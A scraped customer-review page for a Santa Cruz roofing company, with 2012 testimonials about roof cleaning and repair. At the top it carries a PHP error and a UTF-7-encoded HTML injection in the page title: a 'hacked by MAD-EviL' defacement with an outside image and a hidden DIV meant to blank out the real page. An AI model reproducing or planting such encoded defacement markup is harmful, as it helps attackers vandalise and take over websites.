Warning: preg_match() [function.preg-match]: Unknown modifier 't' in /home/pacificy/public_html/wp-content/plugins/mobile-website-builder-for-wordpress-by-dudamobile/dudamobile.php on line 603
Pacific Roof Solutions Reviews and Testimonals | +ADw-/title+AD4APA-html+AD4 +ADw-head+AD4 +ADw-meta http-equiv+AD0AIg-Content-Type+ACI content+AD0AIg-text/html+ADs charset+AD0-windows-1252+ACIAPg +ADw-title+AD4-hacked by MAD-EviL+ADw-/title+AD4 +ADw-meta name+AD0AIg-keywords+ACI content+AD0AIg-hacked by MAD-EviL hacked by MAD-EviL hacked by MAD-EviL mad-evil+ACIAPg +ADw-meta name+AD0AIg-description+ACI content+AD0AIg-hacked by MAD-EviL hacked by MAD-EviL+ACIAPg +ADw-/head+AD4 +ADw-body bgcolor+AD0AIgAj-000000+ACIAPg +ADw-p align+AD0AIg-center+ACIAPgA8-b+AD4APA-font size+AD0AIg-6+ACI color+AD0AIgAj-FFFFFF+ACIAPg-Own3d By MAD-EviL+ADw-br+AD4 +ADw-img border+AD0AIg-0+ACI src+AD0AIg-http://c.top4top.net/p+AF8-351c9wha1.jpg+ACI width+AD0AIg-520+ACI height+AD0AIg-366+ACIAPgA8-br+AD4 ./Und3r r00t+ADw-/font+AD4APA-/b+AD4APA-/p+AD4 +ADw-/body+AD4 +ADw-/html+AD4APA-DIV style+AD0AIg-DISPLAY: none+ACIAPgA8-xmp+AD4-

Reviews and Testimonals

Click here to submit your review.




Submit your review
* Required Field


Such quality service! We had a twelve year old roof that looked terrible, and now it looks like new! would recommend you and your team to everyone we

Sep 11, 2012 by Anne B
Location: Aptos 


Such quality service! We had a twelve year old roof that looked terrible, and now it looks like new! would recommend you and your team to everyone we know! Reliable, friendly fantastic customer service- a cut above the rest!


“The before and after difference is remarkable. After the treatment it looks like a brand new roof with no traces of the mold that caused noticeable b

Sep 11, 2012 by AW
Location: Santa Cruz 


“The before and after difference is remarkable. After the treatment it looks like a brand new roof with no traces of the mold that caused noticeable black discoloration all over. We are very pleased with the results.”
- Alexandra W., Santa Cruz


Thank you very much. You have done a wonderful job on the entire project. It has been a delight working with you

Aug 28, 2012 by E Kiktavi
Location: Santa Cruz 


Thank you very much. You have done a wonderful job on the entire project. It has been a delight working with you


I forwarded your information to several friends and told them what a great job you did for us. Thank you very much.

Aug 28, 2012 by T. Goricki
Location: Aptos, CA 


I forwarded your information to several friends and told them what a great job you did for us. Thank you very much.


Pacific Roof Solutions’ customer service and quality workmanship is above everybody else. They provided a thorough inspection, a clear and reasonabl

Aug 28, 2012 by KS
Location: Palo Alto 


Pacific Roof Solutions’ customer service and quality workmanship is above everybody else. They provided a thorough inspection, a clear and reasonable estimate, outstanding roof repairs, and gutter guard installation. We loved working with Eric and his team.


My house was really in need of some professional help and Eric MORE than accomplished the job. The difference is remarkable. I am so pleased. Most imp

Aug 22, 2012 by DM


My house was really in need of some professional help and Eric MORE than accomplished the job. The difference is remarkable. I am so pleased. Most importantly, Eric is extremely honest and professional. Outstanding quality workmanship and great concern about his customers’ satisfaction. So refreshing!Thank you so much and I will definitely be referring you to family and friends.


Pacific Roof Solutions’ customer service and quality workmanship is above everybody else. They provided a thorough inspection, a clear and reasonable

May 28, 2012 by KS
Location: Monterey, CA 


Pacific Roof Solutions’ customer service and quality workmanship is above everybody else. They provided a thorough inspection, a clear and reasonable estimate, outstanding roof repairs, and gutter guard installation. We loved working with Eric and his team.


“I forwarded your information to several friends and told them what a great job you did for us. Thank you very much.”

Apr 29, 2012 by T. Goricki
Location: Aptos 


“I forwarded your information to several friends and told them what a great job you did for us. Thank you very much.”


“Wanted to thank you for a great job you did on my house. Your service was thorough and this really made the difference as my roof is a technical ce

Apr 29, 2012 by D. Topping
Location: Willow Glen 


“Wanted to thank you for a great job you did on my house. Your service was thorough and this really made the difference as my roof is a technical cedar shingle. We look forward to using you in the future. Take care and Thank you”


“I have cleaned my roof and gutters every year of oak leaves and pine needles. The last few years the roof started to turn a sooty grey color and gr

Apr 29, 2012 by A.R. Rossing
Location: Pebble Beach 


“I have cleaned my roof and gutters every year of oak leaves and pine needles. The last few years the roof started to turn a sooty grey color and green moss started to grow. I contacted Eric of “Pacific Roof Solutions”. He and his crew did a professional job at a fair price. My wife says it looks like a new roof! If you want a clean roof call “Pacific Roof Solutions”


Pacific Roof Solutions (831) 677-2313 139 Darwin St Santa Cruz CA, 95062 USA 5.0 5.0 11 11 Such quality service! We had a twelve year old roof that looked terrible, and now it looks like new! would recommend you and your team to everyone we know! Reliable, friendly fanta
Page:

12

“Thank you very much. You have done a wonderful job on the entire project. It has been a delight working with you.”

E. Kiktavi, Santa Cruz

“Professional, clean, quality, just like your sign says. You guys are the cleanest builders I’ve ever seen”

Remodel neighbor

“Beautiful work.”

Monterey city building inspector

“Nice job – The difference is remarkable.  Thanks”

R. Zucker, Pebble Beach

Pacific Roof Solutions
139 Darwin St Santa CruzCA95062 USA 
 • (831) 677-2313